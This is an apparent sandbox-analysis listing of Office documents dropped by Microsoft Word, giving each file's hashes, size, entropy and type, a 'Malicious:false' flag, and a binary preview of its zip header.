                                                                                                                                                                                                                                                                                                                                                                          SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):777647
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.689662652914981
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                                                                                                                                                                                                                                          MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):924687
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.824849396154325
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                                                                                                                                                                                                                                          MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):966946
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8785200658952
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                                                                                                                                                                                                                                          MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1204049
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.92476783994848
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                                                                                                                                                                                                                                          MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):486596
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.668294441507828
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                                                                                                                                                                                                                                          MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):976001
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.791956689344336
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                                                                                                                                                                                                                                          MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1463634
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.898382456989258
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                                                                                                                                                                                                                                          MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2218943
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.942378408801199
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                                                                                                                                                                                                                                          MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1750795
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.892395931401988
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                                                                                                                                                                                                                                          MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2924237
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.970803022812704
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                                                                                                                                                                                                                                          MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2357051
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929430745829162
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                                                                                                                                                                                                                                          MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3611324
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.965784120725206
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                                                                                                                                                                                                                                          MD5:FB88BFB743EEA98506536FC44B053BD0
